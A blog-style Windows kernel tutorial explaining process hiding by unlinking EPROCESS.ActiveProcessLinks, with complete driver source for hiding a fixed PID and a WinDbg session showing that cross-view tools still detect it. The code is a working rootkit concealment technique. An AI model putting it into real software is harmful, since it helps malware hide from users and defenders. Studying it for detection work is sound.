2013六月3

WD-摘除ActiveProcessLinks链表隐藏指定PID进程

功能实现比较简单:

1.传入pid

2.通过RtlGetVersion获得系统版本号,再查表得到该版本下EPROCESS中ActiveProcessLinks的硬编码偏移。注意该偏移随系统版本、Service Pack和位数(x86/x64)而变化;偏移错误时RemoveEntryList会改写两个无关的内核对象并直接蓝屏,因此版本不匹配时必须拒绝操作,而不能猜一个值。

3.通过PsLookupProcessByProcessId获得EPROCESS指针(该调用会增加对象引用计数),无论摘链是否成功,用完后都要用ObDereferenceObject释放引用,否则进程对象永远无法销毁。

4.对该EPROCESS中的ActiveProcessLinks调用RemoveEntryList即可。但有两点需要注意:(1) 内核用于保护这条链表的锁并未导出,这里的摘链与同时发生的进程创建/退出之间存在竞争;(2) RemoveEntryList只修改前后两个邻居节点,被摘节点自身的Flink/Blink仍指向原邻居,而进程退出时内核会再次对它摘链,如果邻居此时已经释放就会蓝屏,所以摘链后应把该节点的Flink/Blink指向自身(InitializeListHead),让第二次摘链变成无害操作。

示例代码如下:

#include <ntifs.h>
 
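/*
 * Hide a process by unlinking its EPROCESS from the kernel's ActiveProcessLinks
 * list (DKOM). Enumerators that walk that list stop seeing it; every other
 * kernel reference to the EPROCESS (e.g. MmProcessLinks, see the WinDbg session
 * below) is untouched, so the process remains discoverable by other means.
 *
 * ProcessId  PID of the target, in the HANDLE form PsLookupProcessByProcessId
 *            expects.
 *
 * Returns STATUS_SUCCESS once the entry has been unlinked. Returns
 * STATUS_UNSUCCESSFUL when the running OS version has no verified offset or
 * the computed list-entry address is not resident; otherwise the NTSTATUS of
 * the failing kernel call.
 *
 * Known limitations - read before reusing:
 *  - The lock the kernel uses to protect ActiveProcessLinks is not exported,
 *    so this unlink races with concurrent process creation/termination.
 *  - The field offset is hard-coded per OS version/service pack/architecture.
 *    With a wrong offset RemoveEntryList overwrites two unrelated kernel
 *    objects; only versions with a verified offset are allowed through.
 *  - MmIsAddressValid says only that the page is resident at that instant; it
 *    is neither a type check nor a guarantee that still holds a moment later.
 */
NTSTATUS RemoveNodeFromActiveProcessLinks(HANDLE ProcessId)
{
	NTSTATUS status = STATUS_UNSUCCESSFUL;
	ULONG_PTR offset = 0;
	PEPROCESS peprocess_obj = NULL;
	PLIST_ENTRY plist = NULL;
	RTL_OSVERSIONINFOEXW osver = { sizeof(RTL_OSVERSIONINFOEXW) };

	if (!NT_SUCCESS(RtlGetVersion((PRTL_OSVERSIONINFOW)&osver)))
	{
		KdPrint(("[RemoveNodeFromActiveProcessLinks]--RtlGetVersion fail\n"));
		return STATUS_UNSUCCESSFUL;
	}

	/* Only Windows XP (5.1) has been verified; 0x88 is the offset of
	 * EPROCESS.ActiveProcessLinks there. Confirm with `dt nt!_EPROCESS` in
	 * WinDbg before adding any other version - never guess. */
	if (5 == osver.dwMajorVersion && 1 == osver.dwMinorVersion)
	{
		offset = 0x88;
	}

	if (0 == offset)
	{
		KdPrint(("[RemoveNodeFromActiveProcessLinks]--unsupported OS version %lu.%lu\n",
			osver.dwMajorVersion, osver.dwMinorVersion));
		return STATUS_UNSUCCESSFUL;
	}

	/* Takes a reference on the EPROCESS; it is released below on every path. */
	status = PsLookupProcessByProcessId(ProcessId, &peprocess_obj);
	if (!NT_SUCCESS(status))
	{
		KdPrint(("[RemoveNodeFromActiveProcessLinks]--PsLookupProcessByProcessId fail 0x%08X\n",
			status));
		return status;
	}

	/* Explicit integer->pointer conversion: we want the byte address of the
	 * embedded LIST_ENTRY, not PEPROCESS pointer arithmetic, and the original
	 * implicit ULONG_PTR -> PLIST_ENTRY assignment is only a warning away from
	 * silently compiling the wrong thing. */
	plist = (PLIST_ENTRY)((ULONG_PTR)peprocess_obj + offset);

	status = STATUS_UNSUCCESSFUL;
	if (MmIsAddressValid(plist))
	{
		RemoveEntryList(plist);

		/* RemoveEntryList only patches the neighbours; the removed entry still
		 * points at them. The kernel unlinks this entry again when the process
		 * exits, and stale neighbour pointers would then corrupt memory or
		 * bugcheck. Pointing the entry at itself turns that second unlink into
		 * a harmless no-op. */
		InitializeListHead(plist);

		status = STATUS_SUCCESS;
	}

	ObDereferenceObject(peprocess_obj);
	return status;
}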
 
 
/*
 * Driver unload routine. There is nothing to tear down: the driver holds no
 * resources, and the unlink performed in DriverEntry is not reverted here.
 */
VOID DDKUnload(IN PDRIVER_OBJECT pDriverObject)
{
	UNREFERENCED_PARAMETER(pDriverObject);
}
 
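/*
 * Driver entry point: registers the unload routine and hides one hard-coded
 * PID. The PID is baked in at build time (1488 was the author's calc.exe
 * instance); for anything beyond a demo it should come from an IOCTL or the
 * registry path rather than a constant.
 *
 * Always returns STATUS_SUCCESS so the driver stays loaded even when the
 * unlink fails; the failure is only reported through KdPrint.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,
					 IN PUNICODE_STRING pRegistryPath)
{
	/* PIDs are passed to the Ps API as HANDLE values; go through ULONG_PTR so
	 * the widening is explicit on 64-bit builds instead of an implicit
	 * int -> pointer conversion. */
	const HANDLE target_pid = (HANDLE)(ULONG_PTR)1488;
	NTSTATUS status;

	UNREFERENCED_PARAMETER(pRegistryPath);

	KdPrint(("Enter DriverEntry\n"));
	pDriverObject->DriverUnload = DDKUnload;

	status = RemoveNodeFromActiveProcessLinks(target_pid);
	if (!NT_SUCCESS(status))
	{
		/* Unsupported OS version, PID not found, or address not resident. */
		KdPrint(("RemoveNodeFromActiveProcessLinks failed: 0x%08X\n", status));
	}

	KdPrint(("DriverEntry end\n"));
	return STATUS_SUCCESS;
}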

效果图如下:任务管理器中已经找不到该进程,但XueTr(ARK工具)仍能发现它并标为红色——说明只摘ActiveProcessLinks一条链很容易被交叉视图检测出来。

hideprocess.png

但是,这样只是把进程从ActiveProcessLinks这一条链上摘掉了,EPROCESS对象本身仍被内核其他结构引用。例如同样位于EPROCESS中的MmProcessLinks链表仍可遍历到它(这也是ARK工具做交叉视图检测的依据之一),如:

kd> dt EPROCESS -y MmProcessLinks 84afdd08  
nt!EPROCESS
   +0x230 MmProcessLinks : _LIST_ENTRY [ 0x84c233c0 - 0x84e7f250 ]
kd> dt _LIST_ENTRY 84afdd08  + 230
ntdll!_LIST_ENTRY
 [ 0x84c233c0 - 0x84e7f250 ]
   +0x000 Flink            : 0x84c233c0 _LIST_ENTRY [ 0x84e9dfb8 - 0x84afdf38 ]
   +0x004 Blink            : 0x84e7f250 _LIST_ENTRY [ 0x84afdf38 - 0x84847700 ]

kd> dt EPROCESS -y ImageFileName 0x84c233c0-230
nt!EPROCESS
   +0x164 ImageFileName : [16]  "taskmgr.exe"
kd> dt EPROCESS -y ImageFileName 0x84e7f250-230
nt!EPROCESS
   +0x164 ImageFileName : [16]  "TPAutoConnect.e"

文章作者:hgy413
本文地址:https://hgy413.com/1457.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!
